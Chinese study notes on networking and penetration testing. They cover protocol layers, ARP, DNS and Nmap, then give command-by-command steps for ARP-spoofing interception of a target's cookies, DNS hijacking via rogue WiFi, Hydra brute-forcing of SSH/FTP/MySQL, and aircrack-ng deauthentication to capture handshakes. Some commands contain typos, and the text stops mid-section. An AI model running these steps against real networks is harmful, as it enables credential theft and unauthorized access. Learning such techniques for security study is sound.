應用層:【HTTP協議、FTP協議、SMTP協議】 [報文]
運輸層:【TCP協議 [報文段]、UDP協議 [用戶數據報]】
網絡層:【IP協議(配套使用ARP、ICMP\IGMP)】[IP數據報]
數據鏈路層:【MAC層】[幀]
物理層: [bit]
ARP (地址解析協議)
局域網中,網絡傳輸的是“幀”,幀裏有目標主機的MAC地址。同一個局域網中一個主機要和另一個主機通信,必須知道目標主機的MAC地址,
ARP的功能就是 在主機發送數據幀前將目標IP地址轉換成MAC地址。
CMD: ARP -A 當前電腦所緩存的mac地址和ip地址對應表
通信步驟:pc1在本地ARP緩存如果沒有找到pc2的映射,就將ARP請求幀廣播到本地網絡上,pc2收到後回覆MAC信息給pc1。
arp欺騙步驟:
1.欺騙目標主機和網關:arpspoof -i 網卡 -t IP1 IP2【告訴ip1我是ip2】
arpspoof -i eth0 -t 192.168.106 192.168.1.1
arpspoof -i eth0 -t 192.168.1.1 192.168.106
2.打開路由轉發功能:linux因爲系統安全考慮是不支持IP轉發的,其配置文件寫在/proc/sys/net/ipv4/ip_forward中。默認爲0
臨時打開: echo 1>/proc/sys/net/ipv4/ip_forword
永久打開: 編輯配置文件/etc/sysctl.conf net.ipv4.ip_forward=1
3.抓包
用tcpdump抓包:tcpdump -i 網卡 -Av -c 200 dst 指定網站ip地址
4.目標主機去訪問指定的網站
5.抓到目標主機登陸網站的cookies
DNS(域名系統)
域名與IP地址對應。域名解析(或主機名解析)映射保存在hosts文件
CMD命令: nslookup
dns劫持:開放免費wifi,劫持dns去自設的代理服務器,獲得訪問權限
Nmap工具
1.主機發現
原理與ping類似,發送探測包到目標主機,收到回覆說明主機是開啓的。
【根據不同的情況發送不同的探測包,繞過防火牆】 例:arp報文、icmp報文、tcp三次握手SYN/ACK、udp、SCTP協議
常用命令:-sn(用ping只進行主機發現過程);-Pn(已確定主機存在直接進行端口掃描);traceroute(跟蹤路由);
2.端口掃描
3.服務版本
4.系統探測
口令爆破
Hysra工具
參數詳解
-l LOGIN:指定用戶名
-L FILE:指定用戶名字典
-p PASS小寫:指定密碼
-P FILE大寫:指定密碼字典
-M FILE:指定IP列表
-o FILE:指定結果輸出文件
-V 顯示詳細過程
例:hysra -L 路徑/user.txt【用戶名字典】 -P 路徑/password.txt【密碼字典】 192.168.1.1【ip地址】 -V mysql/SSH/FTP【破解服務】
SSH服務爆破
FTP服務
無線安全
一般筆記本自帶無線網卡無法做實驗,linux中iwconfig命令查看網卡
通信步驟:
STA > AP
--> STA向所有信道發出probe requse探幀發現AP
<-- AP迴應probe response響應幀
--> authentication。STA向AP發出認證請求
<--> 認證過程
<-- AP響應認證結果
--> associations。STA發出關聯請求
<-- AP響應關聯
關聯成功,開始通信
無線口令爆破
linux下 aircrack-ng工具
1.加載好本機無線網卡
2.關閉會產生影響的進程
關閉網絡:service network -manager stop
結束進程:airmon-ng check kill
查看周圍網絡信息:airodump-ng 無線網卡名
抓包:airodump -w 保存文件名 -c 頻道 網卡名
airodump -w 保存文件名 -c 頻道 --bssid AP的BSSID 網卡名
爲了加速握手包的獲取,可以使用aireplay來給AP發送斷開包:aireplay-ng -0 發送次數 -a AP的mac地址 [-c STA的mac地址] 網卡名
字典破解: